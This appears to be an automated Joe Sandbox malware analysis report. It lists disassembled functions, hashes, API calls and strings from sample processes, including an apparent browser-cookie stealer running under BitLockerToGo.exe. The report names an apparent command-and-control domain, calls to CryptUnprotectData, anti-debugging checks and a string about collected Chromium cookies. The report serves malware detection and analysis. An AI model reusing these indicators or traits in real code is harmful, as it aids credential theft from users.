Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24bdfbfd40190e6fb452e2618ab1c326b60adaf3c91ef0e3d706090eecc4a29c
Instruction ID: 0b0a50d7d2f321efcf9528a390d8b3140f2e34459eba903fdb87f7ecea564043
Opcode Fuzzy Hash: 24bdfbfd40190e6fb452e2618ab1c326b60adaf3c91ef0e3d706090eecc4a29c
Instruction Fuzzy Hash: B812FE2AA0C19147EA74563C5890A3EE7919F44304FE44837F69FC67F8CB1DEE548791

Function 00007FF70B922D70 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 66fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32 ref: 00007FF70B922E0D

Strings

PG<;, xrefs: 00007FF70B922DE7
PG<;, xrefs: 00007FF70B922E2B
FA2, xrefs: 00007FF70B922DE0
FA2, xrefs: 00007FF70B922D85

Memory Dump Source

Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true

Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd

Similarity

API ID: FileRead
String ID: FA2$FA2$PG<;$PG<;
API String ID: 2738559852-1104478874
Opcode ID: 549626fc998a93f7196aedd83246cb6ff0aac4143817fa1c6f4222ec57e3cb48
Instruction ID: ae0615004817d554e664375e905b9088a6e61ca571e973f8f3de5a1389818ea9
Opcode Fuzzy Hash: 549626fc998a93f7196aedd83246cb6ff0aac4143817fa1c6f4222ec57e3cb48
Instruction Fuzzy Hash: 27213721E2C18181EA302B19DC04279BA60AF45764FD54633EE5ECE7E0CB3CDA499770

Function 00007FF70B8E7E40 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 277COMMON

Download Yara Rule

Strings

/~, xrefs: 00007FF70B8E8124
aCo2, xrefs: 00007FF70B8E82A5
aCo2, xrefs: 00007FF70B8E80DC
/~, xrefs: 00007FF70B8E7E6B

Memory Dump Source

Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true

Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd

Similarity

API ID:
String ID: aCo2$aCo2$/~$/~
API String ID: 0-3304968679
Opcode ID: 22d7c74f97c3fa7b79090f9a1661b0688eada34713547cfb80454c75f8ba8637
Instruction ID: 849912e2ed82e839ba734fa3022ff9549cbb3174cfae193e6fd3acf560120880
Opcode Fuzzy Hash: 22d7c74f97c3fa7b79090f9a1661b0688eada34713547cfb80454c75f8ba8637
Instruction Fuzzy Hash: D7B1FC36A1D20286FA24969C6840B3EE6D19F44B48FA44436E56FC77F4CF2CEE514BD2

Function 00007FF70B9457D0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON

Download Yara Rule

APIs

RtlDeleteBoundaryDescriptor.NTDLL ref: 00007FF70B945840

Strings

8qJ, xrefs: 00007FF70B945800
9qJ, xrefs: 00007FF70B9457E1
9qJ, xrefs: 00007FF70B945820

Memory Dump Source

Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true

Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd

Similarity

API ID: BoundaryDeleteDescriptor
String ID: 8qJ$9qJ$9qJ
API String ID: 3203483114-2728310733
Opcode ID: 98220400c060dd60d9889ceb9d04c9409702458335335f7592c4203a505f7b5b
Instruction ID: d6244992cb56d62f15330c13493b15d8a30d81804f045f70318e38f6c4909303
Opcode Fuzzy Hash: 98220400c060dd60d9889ceb9d04c9409702458335335f7592c4203a505f7b5b
Instruction Fuzzy Hash: C2018C11E1C006C3FA746B9D1891E3884905F64B49FF35832D80FC63B0EF98DB824221

Analysis Process: 753F.exePID: 4688, Parent PID: 3968COMMON

Execution Graph

Execution Coverage:	13.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	17.4%
Total number of Nodes:	23
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF7C08C3D00 Relevance: 1.9, APIs: 1, Instructions: 434
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001C.00000002.2820718333.00007FF7C08C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff7c08c0000_753F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14744da4a368ebf994de33195638c6335f204d68a0a793dcaa4c7df1ddc3f156
Instruction ID: 9a7f4082469fcce62714a6facbfe2e1a9f91ccfcacb18381a13927346be348f2
Opcode Fuzzy Hash: 14744da4a368ebf994de33195638c6335f204d68a0a793dcaa4c7df1ddc3f156
Instruction Fuzzy Hash: 17D1A630A18A494FE7A8EF2898557B9B7E1FF55320F44817ED84EC7792CF34A8428781

Function 00007FF7C08C3238 Relevance: 1.7, APIs: 1, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNEL32 ref: 00007FF7C08C33C0

Memory Dump Source

Source File: 0000001C.00000002.2820718333.00007FF7C08C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff7c08c0000_753F.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 03d4b97231325e73541b3c3edfcfba4c4a527d01044b6a4eddde1ee6ca48baa2
Instruction ID: dcd3ca94b10e465235cdb002e2af76d92511f04c703d9d046dc01ba533471616
Opcode Fuzzy Hash: 03d4b97231325e73541b3c3edfcfba4c4a527d01044b6a4eddde1ee6ca48baa2
Instruction Fuzzy Hash: CC51047190D7C88FD706DB6888597A9BFF0EF66315F08419EC489CB293CB78A816C791

Function 00007FF7C08C3EB8 Relevance: 1.7, APIs: 1, Instructions: 248
shareCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WNetGetConnectionW.MPR ref: 00007FF7C08C4095

Memory Dump Source

Source File: 0000001C.00000002.2820718333.00007FF7C08C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff7c08c0000_753F.jbxd

Similarity

API ID: Connection
String ID:
API String ID: 1722446006-0
Opcode ID: 120111fb9b2305215a008c59f4d1b40f44837e7559b26920610e118dc850bccd
Instruction ID: 07e69bb6e02b731b59c571722a0b508817cfbdce8428d2d0356a2974f789775b
Opcode Fuzzy Hash: 120111fb9b2305215a008c59f4d1b40f44837e7559b26920610e118dc850bccd
Instruction Fuzzy Hash: 9F816D30518A8D8FDB68EF1898457E977E1EB59310F00826EE84DC7792CF34A985CB81

Function 00007FF7C08C11E1 Relevance: 1.7, APIs: 1, Instructions: 224
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExtractAssociatedIconA.SHELL32 ref: 00007FF7C08C1353

Memory Dump Source

Source File: 0000001C.00000002.2820718333.00007FF7C08C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff7c08c0000_753F.jbxd

Similarity

API ID: AssociatedExtractIcon
String ID:
API String ID: 1041831083-0
Opcode ID: d335fc07ad09ff45236faa86959b27fc680646febc8b3a7c68bce80bdf1a19b1
Instruction ID: 84c9a01ac27cd956c90d57e43cc7b7eb97added2232ac99baa29e0855657bfa9
Opcode Fuzzy Hash: d335fc07ad09ff45236faa86959b27fc680646febc8b3a7c68bce80bdf1a19b1
Instruction Fuzzy Hash: 74619370518A4D8FEB58EF68D846BF57BE0FB59351F00422AE84DC3252DB75E4818BD1

Function 00007FF7C09B3C2D Relevance: .5, Instructions: 470
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001C.00000002.2827340070.00007FF7C09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C09B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff7c09b0000_753F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69f3f82271bdfa21481b5ab17a87a241c4f15a0469e7a1123e2eec03a971f65a
Instruction ID: b39c86c6a8ddaeba52faee9f7d6d4237ef4a4ed8fbed468b08370f6fed3d769f
Opcode Fuzzy Hash: 69f3f82271bdfa21481b5ab17a87a241c4f15a0469e7a1123e2eec03a971f65a
Instruction Fuzzy Hash: D5E14731A0DA894FE7A6EB2898547B57BE1FF55320F5802BBD44CC7293DB18E844C391

Function 00007FF7C09B424A Relevance: .4, Instructions: 409COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2827340070.00007FF7C09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C09B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff7c09b0000_753F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ee8ca755ddd2a65858a8b063d96c556e5b42ecb2db9216188df7b9c4fe39d07
Instruction ID: 5b8f3eab74e956f72b969c9efc2c73489914e50c684a9d18b2ec776b55d7f9cc
Opcode Fuzzy Hash: 8ee8ca755ddd2a65858a8b063d96c556e5b42ecb2db9216188df7b9c4fe39d07
Instruction Fuzzy Hash: 9AC14231A0DA894FE7A5EB6848547B9BBE1FF55334B4801BED84DC7293DB18B804C3A1

Function 00007FF7C09B1860 Relevance: .3, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2827340070.00007FF7C09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C09B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff7c09b0000_753F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78d6074111d717439d1a8c3ee205ac7646d8a1326d56bb03d43b3e9ac3c2ac96
Instruction ID: e9df14e3c3ba8c12f888b29b2944a2a1043abb7076b67e5208d426ee73554bda
Opcode Fuzzy Hash: 78d6074111d717439d1a8c3ee205ac7646d8a1326d56bb03d43b3e9ac3c2ac96
Instruction Fuzzy Hash: 03A10661D0DAC94FE766AB3858653B9BBB0FF56724F8801BBD44CC7293DA18A804C391

Function 00007FF7C09B427D Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2827340070.00007FF7C09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C09B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff7c09b0000_753F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc5008a73196cbd2b8fd0e3ca5d849bc6ccadfba30146f3b2152993e5ea6f363
Instruction ID: e3b9bac5b161457912939270e5ff9be5e8624687e1b94bd60862af5e544af2a0
Opcode Fuzzy Hash: bc5008a73196cbd2b8fd0e3ca5d849bc6ccadfba30146f3b2152993e5ea6f363
Instruction Fuzzy Hash: 4C81F471E0DAC64FE7A6EB684464774BBE1EF12334B9800FEC44DC7293DA18B84593A1

Function 00007FF7C09B15BE Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2827340070.00007FF7C09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C09B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff7c09b0000_753F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 145f85848b9e383c4f798598bce07e2bfb0a39d98a849b8471393fd80ea9e96f
Instruction ID: f3d7c8d4c45b8ad9e9f16f86bfeebdb0586d442008d7117e8a992cd5113a6c53
Opcode Fuzzy Hash: 145f85848b9e383c4f798598bce07e2bfb0a39d98a849b8471393fd80ea9e96f
Instruction Fuzzy Hash: E951C622E0DA858FE7B9AB2854553B8B7E1EF55B70BD801BAC44DC72C3DE18B80583D1

Function 00007FF7C09B1785 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2827340070.00007FF7C09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C09B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff7c09b0000_753F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3161fb7cfe1c1ae8584202b2daa5a1b1710a7d66407622d77d58118503d47e10
Instruction ID: 5d8b75fbc65a638406f97599210c9faa0c20f0cf59ef2b97c5e7c9a108740ecc
Opcode Fuzzy Hash: 3161fb7cfe1c1ae8584202b2daa5a1b1710a7d66407622d77d58118503d47e10
Instruction Fuzzy Hash: E941F471D0D6C98FE3A6AB3858542B4BBF0EF56634B9801FAD48CC7693DE186816C391

Function 00007FF7C09B1914 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2827340070.00007FF7C09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C09B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff7c09b0000_753F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de036cc6431faee953eb0e8cb02064e57ac8ac676074f428d4c0134ee36a5423
Instruction ID: ce130117fc72d3b908238f8b975cff07848583c5efe7e7cf235f2ec09e23cafc
Opcode Fuzzy Hash: de036cc6431faee953eb0e8cb02064e57ac8ac676074f428d4c0134ee36a5423
Instruction Fuzzy Hash: 6C31DC61E0E9C64FF7A5BB3824653B8A6E0EF55B74BD801BAC44DC32C3DE1878444791

Function 00007FF7C09B160A Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2827340070.00007FF7C09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C09B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff7c09b0000_753F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ed13935c524b77ceaa435da76abe622381b9cd0bd2c5ee05f49dd44f42103ac
Instruction ID: 3709825926d40ad583f2b3f648e58d3f3c73f178f753385c512b80ff7726baf3
Opcode Fuzzy Hash: 5ed13935c524b77ceaa435da76abe622381b9cd0bd2c5ee05f49dd44f42103ac
Instruction Fuzzy Hash: EC31B861D1EA868FE3B9AB2814553B8A7E0FF51774BC800BAC44DC72D2DE197C4487A1

Function 00007FF7C09B3E94 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2827340070.00007FF7C09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C09B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff7c09b0000_753F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13a9fffed1410d2ab7974880ccc1cd821473561e66f66457c2425d8617491211
Instruction ID: 2980af4e250515a8ad5a2b290ecd438b95c2cea251f043d7e0b4aae69ff01785
Opcode Fuzzy Hash: 13a9fffed1410d2ab7974880ccc1cd821473561e66f66457c2425d8617491211
Instruction Fuzzy Hash: 93119361D0DD8A5FF7B6EA685455278A6D1FF94630B9841BAC80DC3682DF18F80483A1

Function 00007FF7C09B00A7 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2827340070.00007FF7C09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C09B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff7c09b0000_753F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9aaad43f446a4d9b4c78240f69f52e81ef0eb5cbf62d98b91e458a6adf7658a9
Instruction ID: 4956222cd5eeaca4d16982cb024a9589ab137f34f23f83b7cfb619904ea76191
Opcode Fuzzy Hash: 9aaad43f446a4d9b4c78240f69f52e81ef0eb5cbf62d98b91e458a6adf7658a9
Instruction Fuzzy Hash: F5E0D810E0EA4D5EE3957A7C58153B8A7C1FF91271FC505B6C448C7293DE1C6946C3A9

Analysis Process: 753F.exePID: 4852, Parent PID: 4688COMMON

Execution Graph

Execution Coverage:	17%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	9
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF7C08A3F0E Relevance: 1.7, APIs: 1, Instructions: 212
shareCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WNetGetConnectionW.MPR ref: 00007FF7C08A40A5

Memory Dump Source

Source File: 0000001E.00000002.2339467985.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff7c08a0000_753F.jbxd

Similarity

API ID: Connection
String ID:
API String ID: 1722446006-0
Opcode ID: 44f02f99864801292681d525ed89588051d8f1012b29689db4941ed375ce67c1
Instruction ID: e5456cbfd78625fff00645d691976ca5e5e658d86839321089d484ea7e6bb9c2
Opcode Fuzzy Hash: 44f02f99864801292681d525ed89588051d8f1012b29689db4941ed375ce67c1
Instruction Fuzzy Hash: F2717030518A8D8FDBA9EF28C8457E977E1EF58310F04826AD84DC7792CF74A985CB81

Function 00007FF7C08A1244 Relevance: 1.7, APIs: 1, Instructions: 151
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExtractAssociatedIconA.SHELL32 ref: 00007FF7C08A1353

Memory Dump Source

Source File: 0000001E.00000002.2339467985.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff7c08a0000_753F.jbxd

Similarity

API ID: AssociatedExtractIcon
String ID:
API String ID: 1041831083-0
Opcode ID: 917b02b2067d723dcfec898b6a0f3c17679f4991fcb217a22f7928c677338856
Instruction ID: 4bc6ae935a5745ff5da3ac8ddf123d8e3ed491b02321f98c718304716e033a1e
Opcode Fuzzy Hash: 917b02b2067d723dcfec898b6a0f3c17679f4991fcb217a22f7928c677338856
Instruction Fuzzy Hash: C8414E30518A4D8FDF98EF6CC8457A97BE1FB58351F50822AE84EC3791DB74E8918B81

Function 00007FF7C08A3175 Relevance: 1.6, APIs: 1, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001E.00000002.2339467985.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff7c08a0000_753F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 636ccf2a75031a3b6ed14f41019eb9ea77698a67a860564b39505f9ef092603e
Instruction ID: 1a9e8be8450ef828f36f892a43236021435c540d6728a2e7a55b4c22029c99bf
Opcode Fuzzy Hash: 636ccf2a75031a3b6ed14f41019eb9ea77698a67a860564b39505f9ef092603e
Instruction Fuzzy Hash: 7541317190CA5C8FDB19DF58D845AF97BE0EF66321F04416BD489C7292DB20A816CBA1

Analysis Process: BitLockerToGo.exePID: 4216, Parent PID: 4016COMMON

Execution Graph

Execution Coverage:	14.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	34.2%
Total number of Nodes:	398
Total number of Limit Nodes:	42

Executed Functions

Function 02ED9C80 Relevance: 35.2, Strings: 28, Instructions: 188
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

L, xrefs: 02EDA1E1
Y, xrefs: 02EDA223
o, xrefs: 02EDA291
|, xrefs: 02EDA03F
V, xrefs: 02ED9E19
O, xrefs: 02EDA1F7
u, xrefs: 02EDA2BD
f, xrefs: 02ED9F0B
l, xrefs: 02EDA27B
j, xrefs: 02ED9F42
z, xrefs: 02EDA01E
R, xrefs: 02ED9DD7
b, xrefs: 02ED9EBE
d, xrefs: 02ED9EEA
g, xrefs: 02EDA265
}, xrefs: 02EDA2E9
c, xrefs: 02ED9ED4
\, xrefs: 02ED9E66
], xrefs: 02EDA239
r, xrefs: 02EDA2A7
T, xrefs: 02EDA20D
t, xrefs: 02ED9FD1
q, xrefs: 02ED9FA5
_, xrefs: 02ED9E92
x, xrefs: 02EDA2D3
S, xrefs: 02ED9DED
n, xrefs: 02ED9F79
`, xrefs: 02EDA24F

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: L$O$R$S$T$V$Y$\$]$_$`$b$c$d$f$g$j$l$n$o$q$r$t$u$x$z$|$}
API String ID: 0-417411623
Opcode ID: d90129b1b92f3056f1a816dae3a51f61e21c1dc45a5e5ed7d216337773360f73
Instruction ID: f4773c7bb0619d1195fc208668d6d16e6976ffb617d479b2211e15505550f057
Opcode Fuzzy Hash: d90129b1b92f3056f1a816dae3a51f61e21c1dc45a5e5ed7d216337773360f73
Instruction Fuzzy Hash: 1DE165F424A3808BD3B18F05D66979FBBE4BBD1349F90A98C928C1B245C7B54148CF86

Function 02ED6F80 Relevance: 34.7, APIs: 5, Strings: 13, Instructions: 3249COMMON

Download Yara Rule

Strings

/.)(, xrefs: 02ED8F2E
V^QU, xrefs: 02ED707D
M@K7, xrefs: 02ED79A8
1=#:, xrefs: 02ED98D2
%05+, xrefs: 02ED98CB
Mw, xrefs: 02ED7FD4, 02ED99A1
zFDN, xrefs: 02ED79B2
\^, xrefs: 02ED957E
=, xrefs: 02ED71BD
oQ`_, xrefs: 02ED7DC8
9'> , xrefs: 02ED8CA3
IT, xrefs: 02ED9560
2PBd, xrefs: 02ED924D

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: %05+$/.)($1=#:$2PBd$9'> $IT$M@K7$V^QU$\^$oQ`_$zFDN$Mw$=
API String ID: 0-2380173426
Opcode ID: 6ebded85da19934334404105ca63650e7e835da8e1f47edb3c5d20391b792a60
Instruction ID: 3ef7f6e290a60c43b051fed5fc23f9d45220183ad0c5715543c2603d79abe129
Opcode Fuzzy Hash: 6ebded85da19934334404105ca63650e7e835da8e1f47edb3c5d20391b792a60
Instruction Fuzzy Hash: 7343AE70144B818BE335CF39C4947A3FBE2AF56308F589A6DC4EB4B692D735A44ACB50

Function 02EDFB2F Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 207
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL ref: 02EDFBCE
GetSystemMetrics.USER32 ref: 02EDFBDF
DeleteObject.GDI32 ref: 02EDFC47
SelectObject.GDI32 ref: 02EDFCA1
SelectObject.GDI32 ref: 02EDFD2F
DeleteObject.GDI32 ref: 02EDFD6C

Strings

, xrefs: 02EDFCFC

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID: Object$DeleteSelect$CallbackDispatcherMetricsSystemUser
String ID:
API String ID: 1449868515-3916222277
Opcode ID: 9e7bc82f0d899c085d02696e79c5935ef88da8f661dcf4c22682adc077bdc2a4
Instruction ID: 17456cce908150e44eeff01b533f98412d9fa1f64141b21492283b6cbd9534ba
Opcode Fuzzy Hash: 9e7bc82f0d899c085d02696e79c5935ef88da8f661dcf4c22682adc077bdc2a4
Instruction Fuzzy Hash: F1915BB4605B008FD3A4EF29D585A16BBF1FB89700B508A6DE89AC7B54D730B854CF92

Function 02EC7DEB Relevance: 12.0, Strings: 9, Instructions: 771
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser, xrefs: 02EC8E4B
?M33, xrefs: 02EC8D3E
/+W, xrefs: 02EC8D56
pq, xrefs: 02EC8C40
S=W?, xrefs: 02EC7F56
Q"&, xrefs: 02EC8D66
O0+X, xrefs: 02EC8D4E
GAF>, xrefs: 02EC8D36
-]%, xrefs: 02EC8D5E

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: -]%$?M33$GAF>$O0+X$S=W?$[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser$pq$/+W$Q"&
API String ID: 0-1662856041
Opcode ID: e7f50dac03e081bac2d7f3910374b0d6070c2473336940365676b47741118f08
Instruction ID: 027374a1facb40d05d4ac88c1900edf22c20723ea68295f0e58d7ff09f81a1a7
Opcode Fuzzy Hash: e7f50dac03e081bac2d7f3910374b0d6070c2473336940365676b47741118f08
Instruction Fuzzy Hash: BE5277B19483808BC324CF24C59176BBBF2FFC5358F249A1DE8D99B291D7349946CB86

Function 02EBFCB0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 338
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

callosallsaospz.shop, xrefs: 02EC0148
tu, xrefs: 02EC0096
pedc, xrefs: 02EBFFED

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: callosallsaospz.shop$pedc$tu
API String ID: 0-2702032971
Opcode ID: 95cca4f18d538cbbe99a80118211c83ed38eab478ade942ebff5ef6a7d5dd5e1
Instruction ID: 0cb54b4fac9474ef0702c38617c30fb40ee638b4f4eb4a56f09353dce525d6f4
Opcode Fuzzy Hash: 95cca4f18d538cbbe99a80118211c83ed38eab478ade942ebff5ef6a7d5dd5e1
Instruction Fuzzy Hash: D8C198B44493D18BD371CF25C484B9FBBE1AFC6308F549A5DE4C81B252C7316949CBA6

Function 02EE3CD0 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 519COMMON

Download Yara Rule

APIs

GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02EE3E10

Strings

/.)(, xrefs: 02EE4201

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID: InformationVolume
String ID: /.)(
API String ID: 2039140958-2587180175
Opcode ID: 94259d3bd49d1d04e183cdc5bef6fc5f91e0cc7e05186c85a98055077a1bd0e1
Instruction ID: ddc9e2b6aa8fdbb09ba0b7c91f9c548eb71b2f4296a0530f69eee9e94d8c16ad
Opcode Fuzzy Hash: 94259d3bd49d1d04e183cdc5bef6fc5f91e0cc7e05186c85a98055077a1bd0e1
Instruction Fuzzy Hash: CC02BF71690B008FDB24CF29D891B26B7F6FB89304F548A6DE5978BB91D730E841CB90

Function 02EC7A10 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 298encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 02EC7BCD

Strings

%$', xrefs: 02EC7C19

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

